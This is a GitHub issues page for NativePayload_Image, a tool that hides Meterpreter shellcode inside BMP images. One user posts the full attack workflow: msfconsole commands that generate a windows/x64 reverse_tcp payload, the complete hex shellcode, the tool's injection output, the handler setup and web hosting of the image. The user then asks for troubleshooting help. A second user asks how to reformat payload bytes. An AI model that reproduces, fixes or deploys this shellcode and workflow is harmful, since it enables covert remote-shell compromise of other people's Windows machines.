damonmohammadbagher / nativepayload_image Goto Github PK

hi, thank you for your sharing such stuff
can i edit the source code to accept Injecting Meterpreter Payload size !
i get error wen try to inject payload size=5855 bytes Segmentation fault !
thank you very match

" step1 : msfconsole
step2 : msf > use payload/windows/x64/meterpreter/reverse_tcp
step3 : set lhost 192.168.1.104
step4 : generate
finally you can use stage1 "

then

NativePayload_Image.exe create “test3.bmp” fc,48,83,e4,f0,e8,cc,00,00,00,41,51,41,50,52,51,56,48,31,d2,65,48,8b,52,60,48,8b,52,18,48,8b,52,20,48,8b,72,50,48,0f,b7,4a,4a,4d,31,c9,48,31,c0,ac,3c,61,7c,02,2c,20,41,c1,c9,0d,41,01,c1,e2,ed,52,41,51,48,8b,52,20,8b,42,3c,48,01,d0,66,81,78,18,0b,02,0f,85,72,00,00,00,8b,80,88,00,00,00,48,85,c0,74,67,48,01,d0,50,8b,48,18,44,8b,40,20,49,01,d0,e3,56,48,ff,c9,41,8b,34,88,48,01,d6,4d,31,c9,48,31,c0,ac,41,c1,c9,0d,41,01,c1,38,e0,75,f1,4c,03,4c,24,08,45,39,d1,75,d8,58,44,8b,40,24,49,01,d0,66,41,8b,0c,48,44,8b,40,1c,49,01,d0,41,8b,04,88,48,01,d0,41,58,41,58,5e,59,5a,41,58,41,59,41,5a,48,83,ec,20,41,52,ff,e0,58,41,59,5a,48,8b,12,e9,4b,ff,ff,ff,5d,49,be,77,73,32,5f,33,32,00,00,41,56,49,89,e6,48,81,ec,a0,01,00,00,49,89,e5,49,bc,02,00,11,5c,c0,a8,01,68,41,54,49,89,e4,4c,89,f1,41,ba,4c,77,26,07,ff,d5,4c,89,ea,68,01,01,00,00,59,41,ba,29,80,6b,00,ff,d5,6a,05,41,5e,50,50,4d,31,c9,4d,31,c0,48,ff,c0,48,89,c2,48,ff,c0,48,89,c1,41,ba,ea,0f,df,e0,ff,d5,48,89,c7,6a,10,41,58,4c,89,e2,48,89,f9,41,ba,99,a5,74,61,ff,d5,85,c0,74,0c,49,ff,ce,75,e5,68,f0,b5,a2,56,ff,d5,48,83,ec,10,48,89,e2,4d,31,c9,6a,04,41,58,48,89,f9,41,ba,02,d9,c8,5f,ff,d5,48,83,c4,20,5e,89,f6,6a,40,41,59,68,00,10,00,00,41,58,48,89,f2,48,31,c9,41,ba,58,a4,53,e5,ff,d5,48,89,c3,49,89,c7,4d,31,c9,49,89,f0,48,89,da,48,89,f9,41,ba,02,d9,c8,5f,ff,d5,48,01,c3,48,29,c6,48,85,f6,75,e1,41,ff,e7

[!] Making New Bitmap File ...
[!] Bitmap File Name : test3.bmp
[+] Creating Header for Bitmap File ...
[>] Header adding (length 54) : 424d5e0e00000000000036000000280000........
[+] Injecting Meterpreter Payload to Bitmap File ...
[>] Injecting Payload (length 449) : fc4883e4f0e8cc00000041514150525156........
[+] Adding Ex-Payload for Bitmap File ...
[>] Ex-Payload adding (length FF * 3114).
[!] File test3.bmp with length 4621 bytes Created.

then

msfconsole
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.104
exploit

then

cp test3.bmp /var/www/html/

then download and open file from another computer (windows x64 architecture) in local network and no one session appear...

or...

when i want to publish as url:

**./NativePayload_Image.exe url "http://192.168.1.104:81/test3.bmp" 510 54

NativePayload_Image Tool , Published by Damon Mohammadbagher , April 2017
Detecting/Injecting Meterpreter Payload bytes from BMP Image Files

[+] Detecting Meterpreter Payload bytes by Image Files
[+] File Scanning .. . .
[+] Reading Payloads from URL "http://192.168.1.104:81/test3.bmp"
[+] Scanning Payload with length 510 from byte 54

Bingo Meterpreter session by BMP images ;)

Unhandled Exception:
System.DllNotFoundException: kernel32
at (wrapper managed-to-native) NativePayload_Image.Program:VirtualAlloc (uint,uint,uint,uint)
at NativePayload_Image.Program.Main (System.String[] args) [0x004db] in <48012d87c7454d0b8ed5325d571ec9b6>:0
[ERROR] FATAL UNHANDLED EXCEPTION: System.DllNotFoundException: kernel32
at (wrapper managed-to-native) NativePayload_Image.Program:VirtualAlloc (uint,uint,uint,uint)
at NativePayload_Image.Program.Main (System.String[] args) [0x004db] in <48012d87c7454d0b8ed5325d571ec9b6>:0**

could You help me please?

Hello, thanks for sharing this great knowledge, i want to ask if there is a way to automate the removal of 0x in the generated payload like below

0xfc , 0x48 , 0x83 “ to fc,48,83

thanks